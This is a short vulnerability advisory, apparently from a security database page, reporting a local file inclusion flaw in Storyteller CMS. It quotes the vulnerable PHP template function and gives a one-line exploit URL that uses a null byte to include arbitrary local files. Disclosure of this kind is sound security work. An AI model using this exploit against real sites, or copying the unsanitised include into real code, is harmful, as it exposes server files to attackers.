Storyteller CMS local file inclusion vulnerability

2010.09.15
Credit: BorN To K!LL
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

== [~] Title: Storyteller CMS (var) Local File Include Vuln [~] Version: n/a [~] Link: http://www.esselbach.com/freeware.php?id=2 == [~] Author: BorN To K!LL - h4ck3r [~] Contact: SQL@hotmail.co.uk == [~] Vuln code: in GetTemplate function , line 113 to 127 function GetTemplate($var) { if (file_exists("templates/$var.tmp.php")) { require("templates/$var.tmp.php"); } else { die ("Error: Can't open template $var"); } return $EST_TEMPLATE; } [~] 3xploit: /core.php?var=[Local-File]%00 == [#] Greetings: Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,, ==


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top